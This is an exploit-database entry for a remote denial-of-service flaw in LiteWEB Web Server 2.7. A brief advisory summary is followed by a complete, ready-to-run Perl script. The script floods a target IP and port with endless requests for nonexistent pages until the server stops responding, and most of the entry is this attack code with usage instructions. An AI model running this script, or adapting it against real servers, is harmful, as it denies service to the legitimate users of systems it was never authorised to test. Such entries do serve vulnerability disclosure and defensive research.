LiteWEB Web Server 2.7 - Invalid Page Remote Denial of Service

2007-06-25T00:00:00
ID EXPLOITPACK:6B21A6F4D247FC832432A0C1F2396E53
Type exploitpack
Reporter Prili
Modified 2007-06-25T00:00:00

Description

LiteWEB Web Server 2.7 - Invalid Page Remote Denial of Service

                                        
                                            source: https://www.securityfocus.com/bid/24628/info

LiteWeb webserver is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.

An attacker can exploit this issue to crash the affected application, denying further service to legitimate users.

This issue affects LiteWeb 2.7; other versions may also be vulnerable. 

#!/usr/bin/perl
#GetOpt STD module
use IO::Socket;
use Getopt::Std;
getopts(":i:p:",\%args);
if(defined $args{i}){
$ip = $args{i};
}
if(defined $args{p}){
$port = $args{p};
}
if(!defined $args{i} or !defined $args{p}){
print "-----------------------------------------------------\n";
print "LiteWEB 2.7 404 Denial of Services\n";
print "info: if u send to the server more than 100 requests\nto nonexisting

pages the server will stop to answer\n";
print "Site: http://www.cmfperception.com/liteweb.html\n";
print "Found By Prili - imprili[at]gmail.com\n";
print "Usage: perl $0 -i <ip address> -p <port> \n";
print "-----------------------------------------------------\n";
exit;
}
$protocol = "tcp";
print "try surfing to the web server.\n";
while (1)
{
$request = "GET /AAAAAAA HTTP/1.0 \n\n";
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
                               PeerPort=>$port,
                               Proto=>$protocol,
                               Timeout=>'1') || die "Can't connect to

address!\n";

print $socket $request;
close($socket);
}